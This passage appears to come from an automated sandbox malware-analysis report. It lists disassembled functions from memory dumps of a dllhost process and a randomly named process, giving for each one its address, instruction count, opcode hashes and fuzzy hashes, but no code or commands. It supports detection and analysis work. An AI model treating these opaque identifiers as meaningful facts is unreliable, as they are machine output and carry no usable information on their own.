                                                    Function 00007FFD9B890C25 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 058b71b8c6b06718eebd70d4aa43f026c5b6eee17880f114bc156a0064becc91
                                                    • Instruction ID: 0eb1816e4859b014fe76b079af624b1a3b2b5f87deda55050c2cb8d8501ee90a
                                                    • Opcode Fuzzy Hash: 058b71b8c6b06718eebd70d4aa43f026c5b6eee17880f114bc156a0064becc91
                                                    • Instruction Fuzzy Hash: 29213736B0D25D8FEB16A7A8AC250DC7F60EF46324F0541F3D1588B1D3D93826469791
                                                    Function 00007FFD9B8C1F39 Relevance: .1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1601bb9a74f8664bbf784149790308a6f3997cadad58e8b35d929a6d5aa44e9d
                                                    • Instruction ID: dd5d475c929707bc6d8eacb515778319bfe19c8281da2660b3f57526aeabde8d
                                                    • Opcode Fuzzy Hash: 1601bb9a74f8664bbf784149790308a6f3997cadad58e8b35d929a6d5aa44e9d
                                                    • Instruction Fuzzy Hash: 4521D371B1C55D8FEBA8FB48D8A1BB473D2EB98710F1542BAE04DC32D2DE246D458781
                                                    Function 00007FFD9B892801 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc0722374dd7f5d32cb27ceb74a72b4a1964e038f7fcb67f34eab1821c160cae
                                                    • Instruction ID: 8363ff0c8168b5caa863c0ec1a8c88efa1fd40ada2eb302dae809357072695f7
                                                    • Opcode Fuzzy Hash: dc0722374dd7f5d32cb27ceb74a72b4a1964e038f7fcb67f34eab1821c160cae
                                                    • Instruction Fuzzy Hash: C1118131B1D90E4BEFA8EBD898A16FC7691FF4C311F410176C40EE32A2DE28AA458740
                                                    Function 00007FFD9B8C1E71 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d27a5ca2d9ed2afe371e9d3d7aa6c6177901a09a0c5b83dafd9b9010f01b99c
                                                    • Instruction ID: ac8d7ce3f4f0ecc5fe6ef85a6b38e6a514cf04dc49d5dcead998706fc2f9c8f4
                                                    • Opcode Fuzzy Hash: 7d27a5ca2d9ed2afe371e9d3d7aa6c6177901a09a0c5b83dafd9b9010f01b99c
                                                    • Instruction Fuzzy Hash: 8121AE71B0995E8BE7A8FB88D8A07B57392FF98310F0547BAD04DC72D2DE2829418781
                                                    Function 00007FFD9B8908F8 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction ID: 4a68c82410f867bffd8e045ff540c6ca1fe90de9d113405a1f11985fa32cb7d3
                                                    • Opcode Fuzzy Hash: 3a7a68018b1501032a8adc41ff329f201c5811d8f0ff5f2f0fecf1f4d2ebfe06
                                                    • Instruction Fuzzy Hash: 28012432B0E92C0B9A38925D984A939B7C2EBDAA303561239D88EC3265CC10BC0343C4
                                                    Function 00007FFD9B890C38 Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c271fe590096c6607e1ba8072ec05b87dd668dc87e306a04fe7f028d7863117
                                                    • Instruction ID: 776413dbcdf361e859ed4126dd996fe4202a5aa6722317317a869c86bb918d17
                                                    • Opcode Fuzzy Hash: 1c271fe590096c6607e1ba8072ec05b87dd668dc87e306a04fe7f028d7863117
                                                    • Instruction Fuzzy Hash: 6811C235B1E28D8FEB12DBB8986419C7FB0EF56714F0644F7C094DB2A2D53827498790
                                                    Function 00007FFD9B890C40 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1f8d1fb934d47c1e3eba8225660d14dfd192ce3456f10cc435a0ab8a61a6eed
                                                    • Instruction ID: b7756bb0709f97f274fa18c8e81a7481ea5173687f4e3b7c945522ae8314e0a2
                                                    • Opcode Fuzzy Hash: b1f8d1fb934d47c1e3eba8225660d14dfd192ce3456f10cc435a0ab8a61a6eed
                                                    • Instruction Fuzzy Hash: 4011AD35A1E28D8FEB12DBB4886419C7FB0EF56714F0641F7D494DB2A2D9382B498790
                                                    Function 00007FFD9B8928A9 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction ID: 551839c90e453559f3579b80c777a3c1b08797269cf072de5c7e795eeb843971
                                                    • Opcode Fuzzy Hash: 00fca603f3fb2148fe7b93f1c6736220236e0d2c11b647390b98295339dcbda0
                                                    • Instruction Fuzzy Hash: A2018F21B1A50E8BEF68EBE8C4A46B82792EF98351F024175D40ED32F6DD29AA418740
                                                    Function 00007FFD9B890C48 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction ID: b6240e9690ef3028b9ffe91f849d668afec13e87a95ae2d3c21249b547c8fee2
                                                    • Opcode Fuzzy Hash: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction Fuzzy Hash: 2B018C35A1E28D8FEB16DBB488641987FB0EF46714F1641F7D054DB2A6D9386B48C780
                                                    Function 00007FFD9B894EBD Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3405caa434e8655256d0ac225e764b1065f80a3c13510de4a2c8eba26871ee06
                                                    • Instruction ID: 693772069a910291eb547abe4060f755ab9c5e17a349cfd1192a05a11dff1f5b
                                                    • Opcode Fuzzy Hash: 3405caa434e8655256d0ac225e764b1065f80a3c13510de4a2c8eba26871ee06
                                                    • Instruction Fuzzy Hash: 10012C35908A59CFCB55EB18C895A99B7F1FB68310F4506EAD409D72A1DB34AE41CF80
                                                    Function 00007FFD9B890C50 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction ID: d36249f8b8b8cfcbd95815f1244933d8a273a63c587a6b87793ec0b606a5f5c0
                                                    • Opcode Fuzzy Hash: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction Fuzzy Hash: 33015A34A1E2898FEB16DBA488A41987FB0EF16704F1641E7D454DB2A6D9386B448741
                                                    Function 00007FFD9B89291E Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction ID: 46210ba721b55378ddd7f3797381cbcb531c8190a2683e15068ceb93a91e0b4c
                                                    • Opcode Fuzzy Hash: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction Fuzzy Hash: E2F03130B1A50E8BEF79EB94C8A47F87761EB58311F1141B9C40EA22A1DE386A84CB40
                                                    Function 00007FFD9B890B77 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction ID: 206be18c23f38dd525a492dab24fa65cb5314288f6118ac102f33633d90ccd54
                                                    • Opcode Fuzzy Hash: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction Fuzzy Hash: 23F0E53525E689CFD741A738C8A16D4BFA0EF03209F4A11EAC489C7963D214585DCB41
                                                    Function 00007FFD9B8A498C Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe0059857850188ca834bb9deb0c628796c0a12cce6edab5c56b557cbbeec22b
                                                    • Instruction ID: bad518acc27fe1c404c169eef8642165906cc6c703a683659a398b6251eb2c1c
                                                    • Opcode Fuzzy Hash: fe0059857850188ca834bb9deb0c628796c0a12cce6edab5c56b557cbbeec22b
                                                    • Instruction Fuzzy Hash: 96F08230B0954E8BEB28AB48D4506B932D0EB58351F1A4178E80EC31A7EE28EA428694
                                                    Function 00007FFD9B8928F1 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction ID: ec5ad483bb3efd2e72b375a089abd2d58b36189eb7ab0fa2f9a96cd09fbe77f8
                                                    • Opcode Fuzzy Hash: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction Fuzzy Hash: 3AF05E30B1A50E8BEFB8DBD4C8A47B83751EF58311F014275D44DA72F2CD29AF858A40
                                                    Function 00007FFD9B8BC929 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e08b2ed80283bc17af9e37fdc389c5836fb46e124ed9390d613211b971e33a2
                                                    • Instruction ID: 649d80ddc78763315b1cd4f9598a5fb85a2babc7086c09b8de3e7fd6cf4475e4
                                                    • Opcode Fuzzy Hash: 5e08b2ed80283bc17af9e37fdc389c5836fb46e124ed9390d613211b971e33a2
                                                    • Instruction Fuzzy Hash: EDF0657151E3C44FC3129B3888594547FB0EE1710535B05EBC0C9CB473D65A8987C312
                                                    Function 00007FFD9B8B7291 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 502656c165f0efd38ff78a945be1757c75016892313afcb463a133a3fcdd75a4
                                                    • Instruction ID: c3ca6bb5a4f1aa7286b8e4234c603f6d3365f8070c81674e415c48165effbd8c
                                                    • Opcode Fuzzy Hash: 502656c165f0efd38ff78a945be1757c75016892313afcb463a133a3fcdd75a4
                                                    • Instruction Fuzzy Hash: CDD05E4370EBAB0EE25886AD38A50B4ABC0EB6E0E17091577E05ACA262E4461A835290
                                                    Function 00007FFD9B8A3B10 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                    Function 00007FFD9B89708D Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3cc0574f13164f8c648b6c951e47e50e2fb150cd5f795d5f2735c1e07c9ecb01
                                                    • Instruction ID: 9f6aacdc4b264e02c7040e5d4e17a3e8f7e84f57516213c08f7f68546743d208
                                                    • Opcode Fuzzy Hash: 3cc0574f13164f8c648b6c951e47e50e2fb150cd5f795d5f2735c1e07c9ecb01
                                                    • Instruction Fuzzy Hash: 4BE01212F5D54D46FBBCA3A858363B854C2EF9C704F4A41B9A05DC32D3DC482D800393
                                                    Function 00007FFD9B8A4028 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a77eb4caab9e1f39587d0d39fbc68952367c8173b8e0f15cb629ace05bf0145
                                                    • Instruction ID: 2fe1fbc98fff44fae1feb6cffb9bb8801160c3c25a0d9729e5f4c78b1ce84c61
                                                    • Opcode Fuzzy Hash: 6a77eb4caab9e1f39587d0d39fbc68952367c8173b8e0f15cb629ace05bf0145
                                                    • Instruction Fuzzy Hash: 78E0C261F0490F4AFB68DF48C4616BE6FB1EF58340F400139C119972E5DE3429838780
                                                    Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction ID: ad2f4052b067b61a18b6528d92cd979851e1deb705113a0321c9aa4fc3d8a01e
                                                    • Opcode Fuzzy Hash: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction Fuzzy Hash: F1C04C06F6B61F41FC3673EE98660ACA9406FDDF10FD70172D64D500E1AD4D22D54156
                                                    Function 00007FFD9B890848 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction ID: f5afea7c36a37803931b794cf177333dd33fbab8ee6d41c43c70345e4a960aca
                                                    • Opcode Fuzzy Hash: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction Fuzzy Hash: B2C08C3461180C8FC908EB28C88480437A0FB0D200BC20090E009C7170E229DCC1C740
                                                    Function 00007FFD9B894015 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40a08b302917f8a13b879a25b4b61b00eaf01c499a01e7f8f1d224c826542e13
                                                    • Instruction ID: 366bdf8116fd6ff3c98838f930a4e3ab9afa9dfead37e7d939c5b27fa711fc75
                                                    • Opcode Fuzzy Hash: 40a08b302917f8a13b879a25b4b61b00eaf01c499a01e7f8f1d224c826542e13
                                                    • Instruction Fuzzy Hash: B2C08C00F0D81A12F35AB3048431ABE08438B84248F8000B0E02E972CECD8C9A0202C7
                                                    Function 00007FFD9B8A94A4 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8a0000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dee97278fb6f60426b32520255e7376c440a1e31f19a32535e9eeaaf09880287
                                                    • Instruction ID: 24cfb49a9699547c0ce1a0d475c24580eed30f809270aea6b1a7b4e322cb6531
                                                    • Opcode Fuzzy Hash: dee97278fb6f60426b32520255e7376c440a1e31f19a32535e9eeaaf09880287
                                                    • Instruction Fuzzy Hash: 35D0C930E0455D8EEBA4DB18C491F9972B2AF48304F6001F6900DE2289CF346E808B50
                                                    Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction ID: 72f6aa97fb536398eea38e94ab17466f98f739a3eecab6c46c8b1349559f7bc5
                                                    • Opcode Fuzzy Hash: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction Fuzzy Hash: F5B01200D6740F01EC2433FA08620A478406B4C600FC60070D80D50091A84D12940242
                                                    Function 00007FFD9B8B2830 Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b8b1000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73667c955eb5ee136476d9db61411991cfc2cda8e4ccc81d79df83209702400c
                                                    • Instruction ID: 17c8dd8f472622085d102e3272749eb397a870b3b4eca9167adc36b74357d375
                                                    • Opcode Fuzzy Hash: 73667c955eb5ee136476d9db61411991cfc2cda8e4ccc81d79df83209702400c
                                                    • Instruction Fuzzy Hash: C8A00204DA794E11EC2832FA1D974947C505B8D155FD621A1EC08805D6E88E16ED0293

                                                    Non-executed Functions

                                                    Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000033.00000002.2248946702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_51_2_7ffd9b890000_dllhost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction ID: 8f7ace8b044e1fd3fa902ae7a00ee120a14cf4ab20fe5cd60dd930381f958173
                                                    • Opcode Fuzzy Hash: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction Fuzzy Hash: 1841CF87B1953685E31F33FC792A9ED5B84CF8527DB0842B7E16E8A0C75C88608393E5

                                                    Executed Functions

                                                    Function 00007FFD9B8C0BC5 Relevance: .4, Instructions: 436COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8b1000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7711c77c5986ad7343334d3dacba3fd7ea13a32461fd9aeeda52b6b4cbc0ea2c
                                                    • Instruction ID: 82753193ef8dbdc64a4c22f657c4f9b477cbe5ca89814db0286853c46f78725e
                                                    • Opcode Fuzzy Hash: 7711c77c5986ad7343334d3dacba3fd7ea13a32461fd9aeeda52b6b4cbc0ea2c
                                                    • Instruction Fuzzy Hash: 58B1F161A6F69E0AE32D67580C930B07791EF86B45B1A83BEC9DBC7097DD18750382C2
                                                    Function 00007FFD9B890D78 Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 544523264367172297e4b0f85b2727dcfd985f7379666eda007c3237d055b933
                                                    • Instruction ID: 75142e47cf86765a8e0d54493544d9edde0790508483d26dd832d46177590e29
                                                    • Opcode Fuzzy Hash: 544523264367172297e4b0f85b2727dcfd985f7379666eda007c3237d055b933
                                                    • Instruction Fuzzy Hash: 0F912271A18A9D8FEB89DB6888697A9BFE0FF99300F4001BBD149C72E6DB781405C341
                                                    Function 00007FFD9B8B5739 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8b1000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M
                                                    • API String ID: 0-3664761504
                                                    • Opcode ID: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction ID: 9c1c9efa9a1d879a35c59a617fd63250d1d0f7c5081eec22b5eab92a9e13bd36
                                                    • Opcode Fuzzy Hash: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction Fuzzy Hash: BFF0306164F3D54FCB169A748868855BF60AE6720174A52EEC046CF2A3EA199886C741
                                                    Function 00007FFD9B8B9089 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8b1000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
